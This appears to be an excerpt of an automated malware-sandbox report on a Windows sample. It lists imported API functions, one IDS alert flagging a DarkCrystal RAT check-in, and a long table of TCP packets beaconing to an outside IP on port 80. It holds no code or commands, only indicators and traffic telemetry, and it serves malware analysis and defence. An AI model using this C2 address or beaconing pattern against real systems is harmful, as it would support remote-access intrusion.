                                                                                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2025-01-11T23:32:51.567229+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449736104.21.38.8480TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jan 11, 2025 23:32:51.061676979 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.066567898 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.066667080 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.067539930 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.072396994 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.427365065 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.432600021 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.510669947 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.567229033 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.762320995 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.762345076 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.762691021 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.808798075 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.813822031 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.902576923 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.902772903 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.907576084 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.957055092 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.961975098 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:51.962162971 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.962318897 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:51.967078924 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.143965960 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.270340919 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.295711994 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.300734997 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.317413092 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.322396040 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.322411060 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.322422981 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.389503956 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.389677048 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.394599915 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.394715071 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.434441090 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.567194939 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.672867060 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.681299925 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.740067005 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.770436049 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.874404907 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.875834942 CET4973880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.879523039 CET8049736104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.879592896 CET4973680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.880753040 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.880940914 CET4973880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.881068945 CET4973880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.885925055 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.988316059 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:52.993416071 CET8049737104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:52.993872881 CET4973780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:53.239368916 CET4973880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:53.244702101 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:53.244759083 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:53.244793892 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:53.340876102 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:53.554296970 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:53.554532051 CET4973880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:53.571986914 CET8049738104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:53.770433903 CET4973880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:53.834446907 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:53.839426041 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:53.839531898 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:53.839603901 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:53.844465971 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.192253113 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.197583914 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.197618961 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.197650909 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.284044981 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.457834005 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.554116011 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.748696089 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.883852005 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.884540081 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.888894081 CET8049739104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.888988018 CET4973980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.889441967 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:54.889511108 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.889626980 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:54.894431114 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:55.239274979 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:55.244307041 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:55.244321108 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:55.244334936 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:55.333323002 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:55.353426933 CET4973880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:55.379810095 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:55.582978010 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:55.754739046 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:56.665577888 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:56.665735006 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:56.665982008 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:56.666028976 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:56.666282892 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:56.666326046 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:57.740664005 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:57.740864038 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:57.745758057 CET8049745104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:57.745857000 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:57.745884895 CET8049740104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:57.745943069 CET4974080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:57.746032000 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:57.750803947 CET8049745104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:58.098711967 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:58.103614092 CET8049745104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:58.103809118 CET8049745104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:58.190722942 CET8049745104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:58.270347118 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:58.440850973 CET8049745104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:58.564970970 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:59.416795015 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:59.422007084 CET8049745104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:59.422137022 CET4974580192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:59.438668966 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:59.443744898 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:59.443840981 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:59.444406986 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:59.449261904 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:59.801676035 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:32:59.806648016 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:59.806683064 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:59.806715012 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:59.909514904 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:32:59.957963943 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:00.153682947 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:00.244112015 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:00.244168997 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:00.716500998 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:00.716835976 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:00.721877098 CET8049752104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:00.721913099 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:00.721931934 CET4975280192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:00.721976042 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:00.722103119 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:00.727339983 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.067326069 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.072751045 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.072791100 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.072820902 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.185548067 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.379714012 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.442842960 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.545175076 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.545245886 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.914207935 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.914876938 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.919379950 CET8049754104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.919442892 CET4975480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.919738054 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:01.919817924 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.919935942 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:01.924736023 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:02.272572041 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:02.277932882 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:02.277962923 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:02.277996063 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:02.392760038 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:02.567266941 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:02.641227961 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:02.701625109 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:02.733350039 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:02.815439939 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.002372980 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.003714085 CET4976380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.009671926 CET8049760104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.009723902 CET4976080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.010133028 CET8049763104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.010199070 CET4976380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.010304928 CET4976380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.017960072 CET8049763104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.364293098 CET4976380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.369400978 CET8049763104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.369437933 CET8049763104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.369467020 CET8049763104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.443346024 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.448287010 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.448503971 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.455404043 CET8049763104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.534033060 CET4976380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.543256044 CET8049763104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.543344975 CET4976380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.558163881 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.564778090 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.844789028 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.849639893 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.849704981 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.849806070 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.854702950 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.903790951 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.904010057 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:03.908868074 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:03.909018993 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.207915068 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:04.212810040 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.213094950 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.213124990 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.230988026 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.301589012 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.457855940 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:04.473462105 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:04.518764973 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.518809080 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.518836975 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:04.518851042 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:04.562329054 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:04.660953045 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.531430006 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.531451941 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.532157898 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.537041903 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.537663937 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.538461924 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.542126894 CET8049768104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.542223930 CET4976880192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.542224884 CET8049767104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.543277025 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.543417931 CET4976780192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.895519018 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:06.900451899 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.900557995 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:06.900587082 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.001715899 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.161010027 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.237212896 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.378983021 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.380065918 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.384383917 CET8049783104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.384459972 CET4978380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.385060072 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.385143042 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.385251045 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.390120029 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.739288092 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:07.744261980 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.744299889 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.744328022 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.827342033 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:07.870578051 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.056376934 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.142602921 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.142683983 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.366354942 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.366642952 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.371606112 CET8049790104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.371643066 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.371671915 CET4979080192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.371722937 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.371855974 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.376691103 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.723547935 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:08.729044914 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.729077101 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.729104042 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.844157934 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:08.973464966 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.084268093 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.160964966 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.240649939 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.241211891 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.245942116 CET8049796104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.246052980 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.246114016 CET4979680192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.246144056 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.246273041 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.251086950 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.257546902 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.262641907 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.263468981 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.263638973 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.268491983 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.598551989 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.603477955 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.603537083 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.614195108 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.619096041 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.619127035 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.619153976 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.705621004 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.734811068 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.755250931 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.864095926 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:09.908478022 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.944005966 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:09.973467112 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.067203999 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.089345932 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.089426994 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.090162039 CET4980980192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.094480038 CET8049804104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.094543934 CET4980480192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.094825983 CET8049803104.21.38.84192.168.2.4
                                                                                Jan 11, 2025 23:33:10.094862938 CET4980380192.168.2.4104.21.38.84
                                                                                Jan 11, 2025 23:33:10.095158100 CET8049809104.21.38.84192.168.2.4
